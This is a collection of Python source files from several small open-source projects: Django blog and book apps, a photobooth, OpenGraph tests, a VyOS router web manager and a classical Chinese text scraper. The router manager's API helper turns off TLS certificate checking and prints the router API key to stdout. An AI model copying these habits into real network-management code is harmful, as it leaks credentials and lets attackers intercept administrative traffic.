update_counters.short_description = _(u"Update categories counters")
```
#### File: blogging/blogging/admin.py
```python
from collections import OrderedDict
from django.contrib import admin
from blogging.actions import (make_draft, make_post_type_action,
make_published, make_selected, update_counters)
from blogging.models import Category, Picture, Post
from blogging.settings import conf
@admin.register(Picture)
class PictureAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("name",)}
list_display = (
'name', 'site', 'description', 'image',
)
list_filter = ('site',)
search_fields = ('name', 'description')
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug": ("name",)}
list_display = (
'name', 'site', 'visible_posts_count', 'all_posts_count',
)
list_filter = ('site',)
search_fields = ('name',)
actions = [update_counters, ]
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = (
'title', 'author', 'status', 'published_on', 'selected', 'post_type',
'site'
)
date_hierarchy = 'published_on'
prepopulated_fields = {"slug": ("title",)}
search_fields = ('excerpt', 'content', 'item__title')
filter_horizontal = ["categories"]
def get_actions(self, request):
actions_list = [
('make_published', (make_published, 'make_published', make_published.short_description)),
('make_draft', (make_draft, 'make_draft', make_draft.short_description)),
('make_selected', (make_selected, 'make_selected', make_selected.short_description)),
]
for k, v in Post.CONTENT_TYPE_CHOICES:
actions_list.append(make_post_type_action(k, v))
return OrderedDict(actions_list)
def get_list_filter(self, request):
if conf.get('POST_LIST_FILTER_BY_AUTHOR', True):
return ['site', 'author', 'status', 'selected', 'categories']
else:
return ['site', 'status', 'selected', 'categories']
def get_changeform_initial_data(self, request):
return {'author': request.user.id}
def formfield_for_manytomany(self, db_field, request, **kwargs):
"""
Monkey patching the form field for categories.
TODO: Create a widget to manage it more easily
"""
field = super(PostAdmin, self).formfield_for_manytomany(db_field, request, **kwargs)
field.queryset = field.queryset.order_by('site__domain')
field.label_from_instance = lambda obj: "{site!s} - {name!s}".format(**{
'site': obj.site, 'name': obj.name
})
return field
```
#### File: blogging/blogging/context_processor.py
```python
from blogging.models import Category, Post
from django.conf import settings
def categories(request):
"""Return the site categories."""
categories = Category.availables.all()
return {'categories': categories}
def latest_posts(request):
"""Return the latest posts."""
latest_items = Post.objects.published(site_id=settings.SITE_ID)[:5]
return {'latest_posts': latest_items}
def month_with_items(request):
"""Return the latest posts."""
months = Post.objects.published(site_id=settings.SITE_ID).dates('published_on', 'month')
return {'month_with_items': months}
def selected_items(request):
"""Return a list of selected items."""
selected_items = Post.objects.published(site_id=settings.SITE_ID).filter(selected=True)
return {'selected_items': selected_items}
```
#### File: blogging/blogging/feeds.py
```python
from django.conf import settings
from django.contrib.sites.models import Site
from django.contrib.syndication.views import Feed
from django.shortcuts import get_object_or_404
from django.utils.translation import ugettext as _
from blogging.models import Category, Post
# TODO: move it to the new blogging conf
description_template = getattr(settings, 'BLOGGING_FEED_DESCRIPTION_TEMPLATE', "blogging/feeds/description.html")
title_template = getattr(settings, 'BLOGGING_FEED_TITLE_TEMPLATE', "blogging/feeds/title.html")
feed_title = getattr(settings, 'BLOGGING_FEED_TITLE', None)
class LatestEntriesByCategory(Feed):
description_template = description_template
title_template = title_template
def get_object(self, request, category_slug):
site = Site.objects.get_current()
return get_object_or_404(Category, slug=category_slug, site=site)
def title(self, category):
return category.name
def link(self, obj):
return obj.get_absolute_url()
def description(self, category):
return _(u"Latest published items from %s") % category
def items(self, category):
return Post.objects.published(site_id=settings.SITE_ID).filter(categories=category)[:20]
class LatestEntries(Feed):
description_template = description_template
title_template = title_template
link = "/"
description = _(u"Latest published entries")
def title(self):
return feed_title or _(u"Latest entries")
def items(self):
return Post.objects.published(site_id=settings.SITE_ID)[:20]
def item_pubdate(self, item):
return item.published_on
def item_author_name(self, item):
return item.author.get_full_name()
def item_categories(self, item):
return item.categories.all()
``` |
{
"source": "jibaku/books",
"score": 2
} |
#### File: books/books/models.py
```python
from __future__ import unicode_literals
from django.contrib.sites.managers import CurrentSiteManager
from django.contrib.sites.models import Site
from django.db import models
from django.db.models import Q
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
import datetime
@python_2_unicode_compatible
class Editor(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField(unique=True)
class Meta:
verbose_name = _('Editor')
verbose_name_plural = _('Editors')
def __str__(self):
return self.name
def cover_filename(instance, filename):
return "books/%s.jpg" % instance.slug
class BookManager(models.Manager):
def published(self):
now = datetime.datetime.now()
queryset = self.filter(validated=True)
queryset = queryset.filter(start_publication_on__lte=now)
q = (
Q(end_publication_on__isnull=False)
& Q(end_publication_on__gt=now)
) | Q(end_publication_on__isnull=True)
queryset = queryset.filter(q)
return queryset
class SiteBookManager(CurrentSiteManager, BookManager):
pass
@python_2_unicode_compatible
class Book(models.Model):
site = models.ForeignKey(Site)
validated = models.BooleanField(default=False)
start_publication_on = models.DateTimeField(default=datetime.datetime.now)
end_publication_on = models.DateTimeField(blank=True, null=True)
lang = models.CharField(max_length=5)
title = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, unique=True, db_index=True)
authors = models.CharField(max_length=200)
editor = models.ForeignKey(Editor)
url = models.URLField(blank=True)
affiliate_url = models.URLField(blank=True)
isbn_10 = models.CharField(max_length=10, null=True, blank=True)
isbn_13 = models.CharField(max_length=13, null=True, blank=True)
asin = models.CharField(max_length=20, null=True, blank=True)
description = models.TextField()
cover = models.ImageField(upload_to=cover_filename, blank=True)
objects = BookManager()
on_site = SiteBookManager()
class Meta:
verbose_name = _('Book')
verbose_name_plural = _('Books')
def __str__(self):
return self.title
```
#### File: books/books/views.py
```python
from django.views.generic import ListView
from django.views.generic import DetailView
from books.models import Book
class BooksList(ListView):
def get_queryset(self):
return Book.on_site.published()
class BookDetail(DetailView):
def get_queryset(self):
return Book.on_site.published()
``` |
{
"source": "jibaku/django-textprocessor",
"score": 2
} |
#### File: textprocessor/templatetags/text_enhancer.py
```python
import re
import markdown
from django.template.defaultfilters import stringfilter
from django.utils.safestring import mark_safe
from django import template
register = template.Library()
@register.filter
@stringfilter
def twitter_username(value):
"""Add a link to twitter for the twitter user reference in a string
>>> twitter_username("Hello, @ev")
u'Hello, <a href="http://twitter.com/ev">@ev</a>'
"""
def repl(m):
return '<a href="http://twitter.com/%(username)s">@%(username)s</a>' % {'username': m.group(1)}
return re.sub(r"@(\w+)", repl, value)
@register.filter(name='markdown')
@stringfilter
def markdown_filter(value):
html = markdown.markdown(value, output_format="html5")
return mark_safe(html)
``` |
{
"source": "jibaku/photobooth",
"score": 3
} |
#### File: jibaku/photobooth/booth-pygame.py
```python
import time
import pygame
from pygame.locals import K_ESCAPE, K_SPACE, QUIT, USEREVENT
COUNTDOWN_DELAY = 4
def timerFunc(countdown, background):
print("Timer CallBack", time.time())
print(countdown)
print("--")
# Display some text
font = pygame.font.Font(None, 36)
text = font.render(str(countdown), 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
textpos.centery = background.get_rect().centery
background.blit(text, textpos)
if countdown == 0:
print("SHOOT")
def top_text(background):
# Display some text
font = pygame.font.Font(None, 36)
text = font.render("space to shoot / esc to quit", 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
background.blit(text, textpos)
def main():
pygame.init()
countdown = COUNTDOWN_DELAY
stop_photobooth = False
screen = pygame.display.set_mode((400, 300))
pygame.display.set_caption('Photobooth')
# Fill background
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill((30, 250, 120))
top_text(background)
# Blit everything to the screen
screen.blit(background, (0, 0))
pygame.display.flip()
while not stop_photobooth:
background.fill((30, 250, 120))
top_text(background)
for event in pygame.event.get():
# any other key event input
if event.type == QUIT:
stop_photobooth = True
if event.type == USEREVENT+1:
if countdown == -1:
pygame.time.set_timer(USEREVENT+1, 0)
countdown = COUNTDOWN_DELAY
else:
timerFunc(countdown, background) #calling the function wheever we get timer event.
countdown -= 1
# get key current state
keys = pygame.key.get_pressed()
if keys[K_SPACE]:
pygame.time.set_timer(USEREVENT+1, 1000)
elif keys[K_ESCAPE]:
print("quit")
stop_photobooth = True
screen.blit(background, (0, 0))
pygame.display.flip()
if __name__ == "__main__":
main()
``` |
{
"source": "jibaku/python-opengraph",
"score": 3
} |
#### File: python-opengraph/tests/test_opengraph.py
```python
from __future__ import absolute_import, unicode_literals
from unittest import TestCase
from opengraph import OpenGraph
from threading import local
import responses
data = local()
class TestOpenGraph(TestCase):
def setUp(self): # NOQA
self.test_document = """
<html><head>
<meta property="og:title" content="Test title">
</head><body></body></html>
"""
@responses.activate
def test_loading_from_url(self):
url = 'http://foo.bar.com/'
responses.add(
responses.GET, url, body=self.test_document,
status=200, content_type='text/html')
og = OpenGraph(url=url)
self.assertEqual(og.title, 'Test title')
def test_get_attr(self):
og = OpenGraph(html=self.test_document)
self.assertEqual(og.title, 'Test title')
with self.assertRaises(AttributeError):
og.attribute_does_not_exist
def test_contains(self):
og = OpenGraph(html=self.test_document)
self.assertIn('title', og)
def test_str_repr(self):
og = OpenGraph(html=self.test_document)
text_of_data = og.__data__.__str__()
self.assertEqual(str(og), text_of_data)
@responses.activate
def test_loading_from_url(self):
def http_callback(request):
# Ugly, but using thread locals in order to capture the request
# headers in the callback, to assert that it's being set correctly
data.headers = request.headers
return (200, {'content-type': 'text/html'}, self.test_document)
url = 'http://foo.bar.com/'
useragent = 'python-opengraph/0.0'
responses.add_callback(
responses.GET, url, callback=http_callback,
content_type='text/html')
og = OpenGraph(url=url, useragent=useragent)
headers = data.headers
self.assertEqual(og.title, 'Test title')
self.assertEqual(headers['user-agent'], useragent)
``` |
{
"source": "jibaku/vycontrol",
"score": 2
} |
#### File: vycontrol/openvpn/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.shortcuts import redirect
from django.conf import settings
from django.urls import reverse
import vyos
def index(request):
if not request.user.is_authenticated:
return redirect('%s?next=%s' % (reverse('registration-login'), request.path))
all_instances = vyos.instance_getall()
hostname_default = vyos.get_hostname_prefered(request)
template = loader.get_template('openvpn/list.html')
context = {
'instances': all_instances,
'hostname_default': hostname_default,
}
return HttpResponse(template.render(context, request))
```
#### File: vycontrol/vycontrol/vyos.py
```python
import requests
import json
import pprint
import sys
from config.models import Instance
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
import perms
def instance_getall(*args, **kwargs):
return perms.instance_getall(*args, **kwargs)
def get_hostname_prefered(*args, **kwargs):
return perms.get_hostname_prefered(*args, **kwargs)
def instance_getall_by_group(*args, **kwargs):
return perms.instance_getall_by_group(*args, **kwargs)
def repvar(s):
return s.replace("-", "_")
def get_url(hostname):
# permcheck
instance = Instance.objects.get(hostname=hostname)
if instance.https == True:
protocol = "https"
else:
protocol = "http"
if (instance.port == None):
instance.port = 443
url = protocol + "://" + instance.hostname + ":" + str(instance.port)
return url
def get_url_manage(hostname):
url = get_url(hostname) + '/config-file'
return url
def get_url_configure(hostname):
url = get_url(hostname) + '/configure'
return url
def get_url_show(hostname):
url = get_url(hostname) + '/show'
return url
def get_url_retrieve(hostname):
url = get_url(hostname) + '/retrieve'
return url
def get_key(hostname):
# permcheck
instance = Instance.objects.get(hostname=hostname)
return instance.key
def api(type, hostname, cmd):
if type == "retrieve":
url = get_url_retrieve(hostname)
elif type == "manage":
url = get_url_manage(hostname)
elif type == "configure":
url = get_url_configure(hostname)
elif type == "show":
url = get_url_show(hostname)
else:
return False
pprint.pprint(cmd)
print(json.dumps(cmd))
post = {'key': get_key(hostname), 'data': json.dumps(cmd)}
print(post)
try:
resp = requests.post(url, verify=False, data=post, timeout=10)
except requests.exceptions.ConnectionError:
return False
print(resp.status_code)
pprint.pprint(resp)
pprint.pprint(resp.json())
if resp.status_code != 200:
# This means something went wrong.
#raise ApiError('POST /tasks/ {}'.format(resp.status_code))
return False
#for todo_item in resp.json():
#print('{} {}'.format(todo_item['id'], todo_item['summary']))
result1 = resp.json()
print(result1['data'])
#result2 = json.loads(result1['data'])
pprint.pprint(result1)
return result1['data']
def api_get(hostname, cmd):
return api('retrieve', hostname, cmd)
def api_show(hostname, cmd):
return api('show', hostname, cmd)
def api_set(hostname, cmd):
return api('configure', hostname, cmd)
def conntry(hostname):
cmd = {"op": "showConfig", "path": ["interfaces"]}
print(json.dumps(cmd))
post = {'key': get_key(hostname), 'data': json.dumps(cmd)}
print(post)
print(get_url_retrieve(hostname))
try:
resp = requests.post(get_url_retrieve(hostname), verify=False, data=post, timeout=10)
except requests.exceptions.ConnectionError:
return False
print(resp.status_code)
if (resp.status_code == 200):
return True
pprint.pprint(resp)
pprint.pprint(resp.json())
return False
def get_firewall_all(hostname):
cmd = {"op": "showConfig", "path": ["firewall"]}
firewall_list = api_get(hostname, cmd)
nfirewall_list = {}
for f in firewall_list:
s = repvar(f)
nfirewall_list[s] = firewall_list[f]
nfirewall_list[f] = firewall_list[f]
return nfirewall_list
def get_interfaces(hostname):
cmd = {"op": "showConfig", "path": ["interfaces"]}
result1 = api_get(hostname, cmd)
return result1
def get_interfaces_all_names(hostname):
interfaces = get_interfaces(hostname)
all_names = []
for itype in interfaces:
for iname in interfaces[itype]:
all_names.append({
'interface_name': iname,
'type': itype
})
if 'vif' in interfaces[itype][iname]:
for vif in interfaces[itype][iname]['vif']:
all_names.append({
'interface_name': iname,
'type': itype,
'vif': vif
})
return all_names
def get_interface(interface_type, interface_name, hostname):
cmd = {"op": "showConfig", "path": ["interfaces", interface_type, interface_name]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall(hostname, name):
cmd = {"op": "showConfig", "path": ["firewall", "name", name]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_rule(hostname, name, rulenumber):
cmd = {"op": "showConfig", "path": ["firewall", "name", name, "rule", rulenumber]}
result1 = api_get(hostname, cmd)
return result1
def set_config(hostname, cmd):
#cmd = {"op": "set", "path": ["interface", interface_type, interface_name, "firewall", direction, "name", firewall_name]}
result1 = api_set(hostname, cmd)
return result1
def insert_firewall_rules(hostname, cmd):
pprint.pprint(cmd)
result1 = api_set(hostname, cmd)
return result1
def get_route_static(hostname):
cmd = {"op": "showConfig", "path": ["protocols","static","route"]}
result1 = api_get(hostname, cmd)
return result1
def set_firewall_syncookies_enable(hostname):
cmd = {"op": "set", "path": ["firewall","syn-cookies",'enable']}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_syncookies_disable(hostname):
cmd = {"op": "set", "path": ["firewall","syn-cookies",'disable']}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_allping_enable(hostname):
cmd = {"op": "set", "path": ["firewall","all-ping",'enable']}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_allping_disable(hostname):
cmd = {"op": "set", "path": ["firewall","all-ping",'disable']}
result1 = api_set(hostname, cmd)
return result1
def get_firewall_portgroup(hostname):
cmd = {"op": "showConfig", "path": ["firewall","group","port-group"]}
result1 = api_get(hostname, cmd)
return result1
def set_firewall_portgroup_del(hostname, group_name):
cmd = {"op": "delete", "path": ["firewall","group",'port-group', group_name]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_portgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'port-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_portgroup_add(hostname, group_name, port):
cmd = {"op": "set", "path": ["firewall","group",'port-group', group_name, "port", port]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_portgroup_delete_port(hostname, group_name, port):
cmd = {"op": "delete", "path": ["firewall","group",'port-group', group_name, "port", port]}
result1 = api_set(hostname, cmd)
return result1
def get_firewall_addressgroup(hostname):
cmd = {"op": "showConfig", "path": ["firewall","group","address-group"]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_networkgroup(hostname):
cmd = {"op": "showConfig", "path": ["firewall","group","network-group"]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_addressgroup_one(hostname, group_name):
cmd = {"op": "showConfig", "path": ["firewall","group","address-group", group_name]}
result1 = api_get(hostname, cmd)
return result1
def get_firewall_networkgroup_one(hostname, group_name):
cmd = {"op": "showConfig", "path": ["firewall","group","network-group", group_name]}
result1 = api_get(hostname, cmd)
return result1
def set_firewall_networkgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'network-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_add(hostname, group_name, address):
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "address", address]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_del(hostname, group_name):
cmd = {"op": "delete", "path": ["firewall","group",'address-group', group_name]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_networkgroup_del(hostname, group_name):
cmd = {"op": "delete", "path": ["firewall","group",'network-group', group_name]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_rangeadd(hostname, group_name, address_start, address_end):
address = str(address_start) + "-" + str(address_end)
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "address", address]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_addressgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'address-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_networkgroup_add(hostname, group_name, network):
cmd = {"op": "set", "path": ["firewall","group",'network-group', group_name, "network", network]}
result1 = api_set(hostname, cmd)
return result1
def set_firewall_networkgroup_description(hostname, group_name, description):
cmd = {"op": "set", "path": ["firewall","group",'network-group', group_name, "description", description]}
result1 = api_set(hostname, cmd)
return result1
def delete_route_static(hostname, subnet, nexthop):
#cmd = {"op": "delete", "path": ["protocols","static","route", subnet, "next-hop", nexthop]}
cmd = {"op": "delete", "path": ["protocols","static","route", subnet]}
result1 = api_set(hostname, cmd)
return result1
def delete_route_rule(hostname, firewall_name, rule_name):
cmd = {"op": "delete", "path": ["firewall", "name", firewall_name, "rule", rule_name]}
result1 = api_set(hostname, cmd)
return result1
def delete_firewall(hostname, name):
cmd = {"op": "delete", "path": ["firewall","name", name]}
result1 = api_set(hostname, cmd)
return result1
def ip_route(hostname):
cmd = {"op": "show", "path": ["ip","route"]}
result1 = api_show(hostname, cmd)
return result1
```
#### File: vycontrol/wanlb/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.shortcuts import redirect
import vyos
def index(request):
all_instances = vyos.instance_getall()
hostname_default = vyos.get_hostname_prefered(request)
template = loader.get_template('wanlb/list.html')
context = {
'instances': all_instances,
'hostname_default': hostname_default,
}
return HttpResponse(template.render(context, request))
``` |
{
"source": "jibanCat/DigitalHumanities",
"score": 3
} |
#### File: DigitalHumanities/Han-Ji/Book.py
```python
from collections import defaultdict, Counter
### WHY "defaultdict", INSTEAD OF THE REGULAR "dict" FUNCTION?
from datetime import datetime
from bs4 import BeautifulSoup
import bs4
from urllib import request
import urllib
import time
import random
import re
import os, sys
import glob
import logging
import pandas as pd
from pygments import highlight
from pygments.formatters import HtmlFormatter
from pygments.lexers import HtmlLexer
# logging information
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
class Book:
"""Han-Ji '<http://hanchi.ihp.sinica.edu.tw/ihp/hanji.htm>'_ Dataset.
Attributes:
flat_bodies (list): a list containing all htmls
flat_passages (list): a list containing the text of all passages (i.e., every individual piece in a book). Users should define their own methods to organize the passages.
flat_heads (list): a list containing all the text of the heads (i.e., the metadata at the top of each individual piece, like title and author). Users should define their own methods to organize the heads.
flat_meta (list): a list containing all metadata (dictionary) extracted from bookmarks. User should define their own methods to extract metadata.
paths (list): a list of paths extracted from the "bookmark" provided in the database. e.g., 集/總集/文選/卷第二十七 詩戊之一/樂府上/古樂府三首/飲馬長城窟行(P.1277)
Args:
bookname (string): the name of the book, default = ''
date (string): the date you collected the book, default = None
creator (string): the name of the creator who created the instance
Methods:
fetch_data(URL): fetch book bs4 obj from a start page URL of a Book in Han-Ji
extract_paths(): extract paths from bookmark in self.flat_bodies list and append paths to self.paths
write_htmls(path): write data into htmls on the disk in path
load_htmls(path): load data from htmls on the disk in path
char_word_counts(char, limits=(1,4)): count the number of occurances of the phrase attach with a certain character
extract_rare_chars(driver_path, normalization=True): extract rare char in every passages. Note that this function would run for a long time.
write_rare_chars(): writing self.flat_rare_chars to `{bookname}_rare_char.json`
update_rare_chars(): replace rare char based on `{bookname}_rare_char.json`
"""
def __init__(self, bookname='', date=None, creator=None):
self.flat_bodies = []
self.flat_passages = []
self.flat_heads = []
self.flat_meta = []
self.paths = []
self.author_bag = defaultdict(list)
self.bookname = bookname
try:
self.date = datetime.strptime(date, '%Y-%m-%d')
except (TypeError,AttributeError,ValueError) as e:
logging.warning("No datetime input provided!")
self.date = ""
self.creator = creator
self.description_dataframe = self._description_dataframe()
def _highlight(self, html_code):
from IPython.display import HTML
formatter = HtmlFormatter(linenos=False, cssclass="source")
html_highlight = highlight(html_code, HtmlLexer(), formatter)
css_style = formatter.get_style_defs()
html_template = """<style>
{}
</style>
{}
""".format(css_style, html_highlight)
return HTML(html_template)
def __getitem__(self, index):
'''
Args:
index (int): Index
Returns:
bs4 html object in the flat_bodies
'''
return self._highlight(
self._pretty_html(
self.flat_bodies[index]
)
)
def __len__(self):
return len(self.flat_bodies)
def _description_dataframe(self):
types = ["meta", "path", "passages",]
variables = ["flat_meta", "paths", "flat_passages",]
methods = ["self.extract_meta", "self.extract_paths", "self.extract_passages"]
current_lengths = [len(self.flat_meta), len(self.paths), len(self.flat_passages)]
df = pd.DataFrame([types, variables, methods, current_lengths]).T
df.columns = ['type', 'variable', 'method', 'current_length']
return df
def __repr__(self):
self.description_dataframe = self._description_dataframe()
description = self.description_dataframe.to_string()
return description
def pretty_print(self, index, highlight=None):
"""pretty print the html source page in a Jupyter notebook cell output"""
from IPython.display import HTML, display
pretty_html_string = self._pretty_html( self.flat_bodies[index] )
if highlight:
pretty_html_string = re.sub(
r"({})".format(highlight),
r'<font style="color: k; background-color: #ffff42">\1</font>',
pretty_html_string
)
return display(HTML(pretty_html_string))
def _pretty_html(self, soup):
"""cut off irrelevant content, such as side columns in the webpage, from the Han-Ji HTML source page.
This procedure aims to save memory for the computer."""
span_id_fontstyle = str(soup.find("span", {"id": "fontstyle"}))
path = str(soup.find('a', attrs={'class', 'gobookmark'}))
HTML_string = """<html>
<body>
{}
</body>
</html>
""".format("{}\n\t{}".format(path, span_id_fontstyle))
return HTML_string
def fetch_data(self, URL, pages_limit=10000, print_bookmark=False, html_cutoff=False,
BASE_URL='http://hanchi.ihp.sinica.edu.tw/ihpc/', sleep_range=(1, 3)):
'''fetch book bs4 obj from a start page URL of a Book in Han-Ji
Args:
URL (string): the start page url from han-ji website
page_limit (int): the limit of next pages you can scrape. default = 10000
print_bookmark (bool): print the bookmark while fetching the data. default = False
html_cutoff (bool): cut off the irrelavant side column and tags in Han-Ji raw html files,
to save memory usage.
'''
for i in range(pages_limit):
# use urllib.request to get the html content of the website
req = request.Request(URL, headers={'User-Agent': 'Mozilla/5.0'})
page = request.urlopen(req)
try:
soup = BeautifulSoup(page, 'lxml')
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
soup = BeautifulSoup(page, "html5lib")
# show information on the screen
if print_bookmark == True:
logging.info("Start fetching {}. {}/{} epoch.".format(
soup.find('a', attrs={'class', 'gobookmark'}).text, i + 1, pages_limit))
else:
logging.info("Start fetching {}. {}/{} epoch.".format(URL, i + 1, pages_limit))
# check if the content is the same as previous page
### ? -> Response: this line is an ad-hoc solution for dealing with the first page while scraping. There must be a better way to do it.
if i > 0:
buffer = self.flat_bodies[-1].find_all('div', attrs={'style': True})
else:
# use a dummy list for the buffer for the first page
buffer = ['dummy']
# if the first and last elements in the buffer are the same as current page
# delete page and save the current page.
### GOOD SOLUTION, BUT ARE WE SURE THERE ARE NO HIDDEN TRAPS IN USING THIS RULE? COULD TWO CONSECUTIVE BUT DIFFERENT POEMS HAVE THE SAME START AND END WORD?
### Response: the comparison here is for end and start sentences of a poem.
### It's quite unlikely two poems have the same start and end senetences, right?
if (buffer[-1] ==
soup.find_all('div', attrs={'style': True})[-1]) and (
buffer[0] ==
soup.find_all('div', attrs={'style': True})[0]):
logging.warning("This page is the same as the previous one, discard previous one and store the new one.")
if html_cutoff == True:
try:
self.flat_bodies[-1] = BeautifulSoup( self._pretty_html(soup), 'lxml' )
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
self.flat_bodies[-1] = BeautifulSoup( self._pretty_html(soup), "html5lib")
else:
self.flat_bodies[-1] = soup
else:
# append to flat bodies
if html_cutoff==True:
try:
self.flat_bodies.append( BeautifulSoup( self._pretty_html(soup), 'lxml'))
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
self.flat_bodies.append( BeautifulSoup( self._pretty_html(soup), "html5lib"))
else:
self.flat_bodies.append(soup)
# find the next page
next_page = soup.find('img', {'src' : '/ihp/snext.gif'})
if next_page != None:
url = next_page.find_parent()['href']
else:
logging.info('No further next page. Stop fetching.')
break
URL = urllib.parse.urljoin(BASE_URL, url)
time.sleep(random.randint(sleep_range[0], sleep_range[1]))
def extract_all(self):
'''do all extractions at one time'''
pass
def extract_paths(self):
'''extract paths from bookmark in self.flat_bodies list and append paths to self.paths'''
self.paths = []
for soup in self.flat_bodies:
# extract "gobookmark" class
path = soup.find('a', attrs={'class', 'gobookmark'}).text
self.paths.append(path)
def extract_meta(self):
'''extract meta data from self.paths.'''
pass
def extract_passages(self):
'''extract passages from the Book. Users should defined their own methods to organize the Book.'''
pass
def _sum_indent_and_padding(self, texts):
'''returns the sum of indents and paddings in the texts.'''
return [
sum([int(num[0]), int(num[1])])
for text in texts
for num in re.findall(r'text-indent:(.*?)em;padding-left:(.*?)em;', text['style'])
]
def _indent_and_padding(self, texts):
'''Return the indent and padding tuples of indents and paddings in the texts.'''
return [
(int(num[0]), int(num[1]))
for text in texts
for num in re.findall(r'text-indent:(.*?)em;padding-left:(.*?)em;', text['style'])
]
def extract_rare_chars(self, driver_path, normalization=True):
"""Extract rare char in every passages. Note that this function would run for a long time.
Args:
driver_path (str) : the path to your selenium driver
normalization (bool) : whether or not using normalization API in academia sinica, default = True.
Updated:
self.flat_rare_bag (list) : {"(components of rare chars)" : ("(UNICODE)", "(UTF-8)"), ...}
After running this funciton, run
>> self.write_rare_chars()
to write a json.
Therefore, you could just run
>> self.update_rare_char()
to update rare char in the next time without extracting rare char from web again.
"""
from rare_char_converter import rare_char_converter
self.flat_rare_chars = []
for body in self.flat_bodies:
while 1:
try:
time.sleep(random.randint(2, 5))
text = body.find("span", {"id":"fontstyle"}).text
rare_char_bag = rare_char_converter(text, driver_path, normalization=True)
self.flat_rare_chars.append(rare_char_bag)
break
except (TimeoutError, ConnectionResetError, urllib.error.URLError) as e:
logging.warning("{}, wait for 10 secs.".format(e))
time.sleep(10)
def write_rare_chars(self):
import json
with open("{}_rare_char.json".format(self.bookname), "w", encoding="utf-8") as file:
json.dump(self.flat_rare_chars, file)
def update_rare_chars(self):
"""Replace rare char based on `{bookname}_rare_char.json`"""
import json
try:
with open("{}_rare_char.json".format(self.bookname), "r", encoding="utf-8") as file:
self.flat_rare_chars = json.load(file)
flat_htmls = []
for soup,rare_char in zip(self.flat_bodies, self.flat_rare_chars):
html = str(soup)
for components,(UICODE, char) in rare_char.items():
html = re.sub(components, char, html)
try:
flat_htmls.append(BeautifulSoup(html, "lxml"))
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
flat_htmls.append(BeautifulSoup(html, "html5lib"))
self.flat_bodies = flat_htmls
except FileNotFoundError as e:
logging.error("""[Error] {}_rare_char.json does not exist
try to run these lines:
\t>> self.extract_rare_chars()
\t>> self.write_rare_chars()\n""".format(self.bookname))
def _regexf(self, char, num):
return r"[^、。,?!:;「」〔〕『』]{" + str(num) + "}" + char
def passage_generator(self):
'''iterate over every passage regardless the hierarchical structure'''
for passages in self.flat_passages:
for p in passages:
yield p
def char_word_counts(self, char, limits=(1, 4)):
'''
Count the number of occurances of the phrase attach with a certain character
Args:
char (str): the character you want to set as the last character in the phrase.
limits (tuple): lower and upper limit for the characters before the `char`.
Yield:
collections.Counter object
'''
return Counter(list(self._word_generator(char, limits)))
def _word_generator(self, char, limits):
lower, upper = limits
for p in self.passage_generator():
for i in range(lower, upper):
for match in re.finditer(self._regexf(char, i), p):
yield match.group(0)
def strip_tag(self, name, attrs={}):
'''
Get rid of a tag (with certain attributes) from all pages in self.flat_bodies.
Args:
tag_name (str) : the tag you want to remove from the tree structure from all pages in self.flat_bodies
attrs (dict) : a dict contains all attribute names and their corresponding value
See also:
bs4's find_all https://www.crummy.com/software/BeautifulSoup/bs4/doc/#find-all
'''
for body in self.flat_bodies:
for sentence in body.find_all(name, attrs=attrs):
sentence.extract()
def strip_all_irrelevant_tags(self, connect_the_borken_lines=True, html_cutoff=True):
'''
remove 標註, page number, and page dividers from the tree structure
'''
if html_cutoff:
flat_bodies = []
for item in self.flat_bodies:
try:
flat_bodies.append(BeautifulSoup(self._pretty_html(item), "lxml"))
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
self.flat_bodies.append(BeautifulSoup(self._pretty_html(item), "html5lib"))
self.flat_bodies = flat_bodies
self.strip_tag("table", attrs={"class":"page"})
self.strip_tag("a", attrs={"href":"#"})
self.strip_tag("span", attrs={"style":"display:none;width:;height:;color:red;font-size:13px"})
self.strip_tag("center")
logging.info("Remove 標註, page number, and page dividers from the tree structure.")
if connect_the_borken_lines:
self.connect_the_borken_lines()
